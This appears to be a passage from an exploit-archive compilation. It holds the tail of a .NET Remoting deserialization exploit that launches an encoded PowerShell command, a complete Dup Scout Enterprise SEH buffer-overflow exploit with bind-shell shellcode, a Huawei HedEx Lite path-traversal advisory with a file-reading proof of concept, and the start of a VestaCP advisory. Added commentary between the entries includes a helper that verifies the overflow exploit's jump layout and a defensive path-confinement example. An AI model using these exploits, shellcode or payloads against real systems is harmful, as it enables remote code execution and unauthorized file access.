    'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh'
    'YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAV'
    'TdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
)
payload = base64.b64decode(payload)
payload = payload.replace(bytes("X" * 1360, 'utf-8'), psh_shell)

uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

msg = bytes()
msg += b'.NET'                     # Header
msg += b'\x01'                     # Version Major
msg += b'\x00'                     # Version Minor
msg += b'\x00\x00'                 # Operation Type
msg += b'\x00\x00'                 # Content Distribution
msg += pack('I', len(payload))     # Data Length
msg += b'\x04\x00'                 # URI Header
msg += b'\x01'                     # Data Type
msg += b'\x01'                     # Encoding - UTF8
msg += pack('I', len(uri))         # URI Length
msg += uri                         # URI
msg += b'\x00\x00'                 # Terminating Header
msg += payload                     # Data

s.send(msg)
s.close()
-
Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
# Date: 2020-12-08
# Exploit Author: Andrés Roldán
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/downloads.html
# Version: 10.0.18
# Tested on: Windows 10 Pro x64

#!/usr/bin/env python3

import socket
import struct

HOST = '127.0.0.1'
PORT = 80

# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\x09\x0a\x0d\x20" -f python -v SHELL
SHELL = b""
SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4"
SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4"
SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8"
SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc"
SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2"
SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41"
SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9"
SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91"
SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5"
SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b"
SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4"
SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca"
SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7"
SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28"
SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb"
SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0"
SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90"
SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7"
SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7"
SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe"
SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7"
SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57"
SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4"
SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6"
SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6"
SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25"
SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec"
SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa"
SHELL += b"\xfa\xa9\x3b\x45"

PAYLOAD = (
    b'\x90' * (2482 - len(SHELL)) +
    SHELL +
    b'\xeb\x10\x90\x90' +              # nSEH: short jmp over the handler into the NOPs
    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
    struct.pack('<L', 0x1002071c) +
    b'\x90' * 32 +
    b'\xE9\x4D\xF6\xFF\xFF' +          # jmp back into the NOP sled in front of SHELL
    b'C' * (10000 - 2482 - 4 - 32 - len(SHELL))
)

HTTP_PAYLOAD = (
    b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' +
    b'Host: ' + HOST.encode() + b'\r\n\r\n'
)

with socket.create_connection((HOST, PORT)) as fd:
    print('[+] Sending payload...')
    fd.sendall(HTTP_PAYLOAD)
    print('[+] Done. Check for a shell on port 4444.')
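The 'sid' exploit above chains two jumps: the overwritten nSEH holds a short jump that skips the handler address and lands in the 32 NOPs, and a five-byte `jmp rel32` at the end of that sled jumps backwards into the NOP sled in front of the shellcode. The distances are easy to get wrong when the shellcode is regenerated, so the following is an added example, not part of the original exploit: it reproduces the buffer layout from the script's constants (2482 bytes before nSEH, `eb 10` short jump, 32 NOPs, `e9 4d f6 ff ff` back-jump, a 352-byte shellcode as listed in the script) and resolves both jumps with x86 relative-branch arithmetic, checking that each lands in a NOP sled. The function names and the `\xcc` stand-in shellcode are mine.

```python
import struct

# Constants read off the 'sid' exploit above.
NSEH_OFFSET = 2482                       # bytes of NOPs + shellcode before nSEH
SHELLCODE_LEN = 352                      # length of the script's msfvenom SHELL
NOPS_AFTER_SEH = 32
SHORT_JMP = b"\xeb\x10\x90\x90"          # nSEH: jmp short +0x10 (plus two pad bytes)
LONG_JMP = b"\xe9\x4d\xf6\xff\xff"       # jmp rel32 back towards the front sled
SEH_HANDLER = 0x1002071c                 # add esp,8 ; ret 4 in libspp.dll


def short_jmp_target(instr_offset, instr):
    """x86 EB rel8: target = address after the 2-byte instruction + rel8."""
    assert instr[0] == 0xEB
    return instr_offset + 2 + struct.unpack("<b", instr[1:2])[0]


def long_jmp_target(instr_offset, instr):
    """x86 E9 rel32: target = address after the 5-byte instruction + rel32."""
    assert instr[0] == 0xE9
    return instr_offset + 5 + struct.unpack("<i", instr[1:5])[0]


def seh_layout(nseh_offset=NSEH_OFFSET, shellcode_len=SHELLCODE_LEN,
               nops_after_seh=NOPS_AFTER_SEH):
    """Buffer offsets of each component and where the two jumps land."""
    shell_start = nseh_offset - shellcode_len
    seh_offset = nseh_offset + 4
    sled2_start = seh_offset + 4
    e9_offset = sled2_start + nops_after_seh
    hop1 = short_jmp_target(nseh_offset, SHORT_JMP)
    hop2 = long_jmp_target(e9_offset, LONG_JMP)
    return {
        "shell_start": shell_start, "seh_offset": seh_offset,
        "e9_offset": e9_offset, "hop1": hop1, "hop2": hop2,
        # hop1 must land inside the 32 NOPs so the slide reaches the E9
        "hop1_in_sled": sled2_start <= hop1 < e9_offset,
        # hop2 must land in the NOPs before the shellcode, never inside it
        "hop2_in_sled": 0 <= hop2 < shell_start,
    }


def build_payload(shellcode, seh_handler=SEH_HANDLER, total=10000):
    """Same construction as the script's PAYLOAD, padded to `total` bytes."""
    body = (b"\x90" * (NSEH_OFFSET - len(shellcode)) + shellcode
            + SHORT_JMP + struct.pack("<L", seh_handler)
            + b"\x90" * NOPS_AFTER_SEH + LONG_JMP)
    return body + b"C" * (total - len(body))


if __name__ == "__main__":
    for key, value in seh_layout().items():
        print("%-13s %s" % (key, value))
    p = build_payload(b"\xcc" * SHELLCODE_LEN)   # stand-in shellcode, not the real one
    print("nSEH bytes at 2482:", p[2482:2486].hex(), "len:", len(p))
```

With the script's numbers the back-jump lands at offset 44, deep in the front sled; the `hop2_in_sled` flag turns false as soon as a shellcode longer than about 2438 bytes pushes the sled boundary past that point.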
-
Huawei HedEx Lite 200R006C00SPC005 - Path Traversal
# Exploit Title: Huawei HedEx Lite 200R006C00SPC005 - Path Traversal # Date: 2020-11-24 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://www.huawei.com/ # Software Link: https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx # Version: 200R006C00SPC005 Document Title: =============== Huawei HedEx Lite (DM) - Path Traversal Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2268 Release Date: ============= 2020-11-24 Vulnerability Laboratory ID (VL-ID): ==================================== 2268 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== Directory- or Path-Traversal Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx Abstract Advisory Information: ============================== A vulnerability laboratory core team researcher discovered a path traversal vulnerability in the Huawei HedEx Lite v200R006C00SPC005. Vulnerability Disclosure Timeline: ================================== 2020-11-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ An exploitable path traversal vulnerability has been discovered in the official Huawei HedEx Lite v200R006C00SPC005. Attackers can able to request local files or resources by remote requesting to unauthorized change a local path. 
Proof of Concept (PoC):
=======================
The path traversal vulnerability can be exploited by remote attackers with restricted system user privileges without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Vulnerable File(s):
./newOtherManageContent.cgi [URL Path Filename]
./newStartupHedExBeeAction.cgi [URL Path Filename]
./newprehomeadvsearch.cgi [URL Path Filename]

--- PoC Session Logs [POST Method Request] ---
URL: http://localhost:7890/newOtherManageContent.cgi/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
Path: /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
Host: localhost:7890
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost:7890/newindex.cgi
Connection: close
Content-Length: 0

--- PoC Session Logs [Response] ---
HTTP/1.1 200 OK
Content-Disposition: attachment; filename="win.ini"
Content-Length: 1801
Content-Type: application/octet-stream;charset=utf-8
X-Frame-Options: SAMEORIGIN
-
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
[Drivers.32]
OLEMessaging.64=$80,$5D,$D9,$A6,$A4,$18,$A8,$AD
[ChannelDownmixer]
p1.bIsMultichannel=0
p1.wFormatTag=1
p1.nChannels=2
p1.dwChannelMask=63
p1.wBitsPerSample=16
p1.RequiredInputBitDepth=0
p1.bRequireInputNumberOfChannels=0
p1.RequiredInputNumberOfChannels=6
p1.bRequireInputSamplerate=0
p1.RequiredInputSamplerate=48000
p1.bRaiseMeritAndSingleInstance=1
p2.InputEnableBitmask=-1
p2.OutputEnableBitmask=-1
p2.bEnableInputGains=0
p2.bEnableOutputGains=0
p2.bEnableMasterVolume=0
p2.MasterVolumeGain=100
p2.I.FL=100
p2.I.FR=100
p2.I.FC=100
p2.I.LF=100
p2.I.BL=100
p2.I.BR=100
p2.I.FLC=100
p2.I.FRC=100
p2.I.BC=100
p2.I.SL=100
p2.I.SR=100
p2.I.TC=100
p2.I.TFL=100
p2.I.TFC=100
p2.I.TFR=100
p2.I.TBL=100
p2.I.TBC=100
p2.I.TBR=100
p2.I.bJoinFLFR=1
p2.I.bJoinBLBR=1
p2.I.bJoinFLCFRC=1
p2.I.bJoinSLSR=1
p2.I.bJoinTFLTFR=1
p2.I.bJoinTBLTBR=1
p2.O.FL=100
p2.O.FR=100
p2.O.FC=100
p2.O.LF=100
p2.O.BL=100
p2.O.BR=100
p2.O.FLC=100
p2.O.FRC=100
p2.O.BC=100
p2.O.SL=100
p2.O.SR=100
p2.O.TC=100
p2.O.TFL=100
p2.O.TFC=100
p2.O.TFR=100
p2.O.TBL=100
p2.O.TBC=100
p2.O.TBR=100
p2.O.bJoinFLFR=1
p2.O.bJoinBLBR=1
p2.O.bJoinFLCFRC=1
p2.O.bJoinSLSR=1
p2.O.bJoinTFLTFR=1
p2.O.bJoinTBLTBR=1
p3.bCustomMixMatrix=0
CustomMixMatrixFilename=
LastRegisteredVersion=20000

Solution - Fix & Patch:
=======================
The vulnerability can be resolved by setting restricted accessible paths. A whitelist or static paths configuration can be combined.
An update is available on the huawei website provided by the manufacturer of the application via customer portal.

Security Risk:
==============
The security risk of the path traversal web vulnerability in the download manager software is estimated as high.

Credits & Authors:
==================
S.AbenMassaoud [Research Team] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media,
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information
on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material
contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
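The fix the advisory names under "Solution - Fix & Patch" (restrict the handlers to a base directory, optionally to a whitelist of static paths) is shown below as an added example; it is not Huawei's or Vulnerability-Lab's code. It percent-decodes the requested path, folds the `%5c` backslashes the PoC relies on to `/`, refuses any `..` segment, and confines the result to a configured document root. `BASE_DIR`, `GOOD_PATH` and the whitelist contents are constructed assumptions; `POC_PATH` is the advisory's own encoded path. The helpers operate on strings only, so the block runs without touching a filesystem.

```python
"""Confining a user-supplied document path to a fixed base directory.

Added example (not Huawei's or Vulnerability-Lab's code).  It models the
mitigation the advisory recommends: a CGI download handler should only ever
serve files below one configured directory, optionally only those on a
whitelist of static paths.  BASE_DIR and GOOD_PATH are constructed.
"""
import posixpath
from typing import Optional, Set
from urllib.parse import unquote

BASE_DIR = "/opt/hedex/docs"   # hypothetical document root (assumption)


def canonicalize(raw: str) -> str:
    """Percent-decode until stable and fold backslashes to '/'.

    Repeating the decode defeats double encoding (%252e -> %2e -> '.'), and
    the backslash fold matters because the PoC uses %5c ('\\'), which Windows
    path APIs accept as a separator even though a naive search for '../'
    would miss it.
    """
    decoded = raw
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded.replace("\\", "/")


def is_traversal(raw: str) -> bool:
    """Detection helper: True when any path segment is '..' after canonicalisation."""
    return ".." in canonicalize(raw).split("/")


def resolve_under_base(raw: str, base_dir: str = BASE_DIR,
                       whitelist: Optional[Set[str]] = None) -> Optional[str]:
    """Return the absolute path to serve, or None when the request must be refused.

    Refuses NUL bytes, any '..' segment, an empty path and, when a whitelist
    is given, any relative path not on it.  The final normpath-plus-prefix
    test is the check that still holds if a new encoding trick gets past the
    segment filter.
    """
    path = canonicalize(raw)
    if "\x00" in path or is_traversal(raw):
        return None
    rel = path.lstrip("/")
    if not rel:
        return None
    if whitelist is not None and rel not in whitelist:
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, rel))
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


# The advisory's PoC path and a constructed legitimate request.
POC_PATH = ("/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c"
            "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini")
GOOD_PATH = "/manuals/hedex-user-guide.pdf"


def demo() -> dict:
    """Run the checks over the PoC path, a double-encoded variant and a normal request."""
    return {
        "poc_flagged": is_traversal(POC_PATH),
        "poc_resolved": resolve_under_base(POC_PATH),
        "double_encoded_flagged": is_traversal("/%252e%252e/%252e%252e/windows/win.ini"),
        "good_resolved": resolve_under_base(GOOD_PATH),
        "good_but_not_whitelisted": resolve_under_base(GOOD_PATH, whitelist={"manuals/release-notes.pdf"}),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In a real handler the returned path should additionally be passed through `os.path.realpath` and re-checked against the base, so that a symlink inside the document root cannot point outside it; `is_traversal` on its own is useful for scanning access logs for requests shaped like the PoC.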
-
VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
# Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
# Date: 2020-11-26
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://vestacp.com/
# Software Link: https://vestacp.com/install/
# Version: 0.9.8-26

Document Title:
===============
VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2240

Release Date:
=============
2020-11-26

Vulnerability Laboratory ID (VL-ID):
====================================
2240

Common Vulnerability Scoring System:
====================================
8.3

Vulnerability Class:
====================
Insufficient Session Validation

Current Estimated Price:
========================
2.000€ - 3.000€

Product & Service Introduction:
===============================
Web interface is open source php and javascript interface based on Vesta open API, it uses 381 vesta CLI calls.
The GNU General Public Licence is a free, copyleft licence for software and other kinds of works. It's free to
change, modify and redistribute source code.

(Copy of the Homepage: https://vestacp.com/features/ & https://vestacp.com/install/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an insufficient session validation vulnerability in the VestaCP v0.9.8-26 hosting web-application.
Affected Product(s):
====================
Vesta
Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-05-04: Researcher Notification & Coordination (Security Researcher)
2020-05-05: Vendor Notification (Security Department)
2020-05-07: Vendor Response/Feedback (Security Department)
2020-**-**: Vendor Fix/Patch (Service Developer Team)
2020-**-**: Security Acknowledgements (Security Department)
2020-11-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
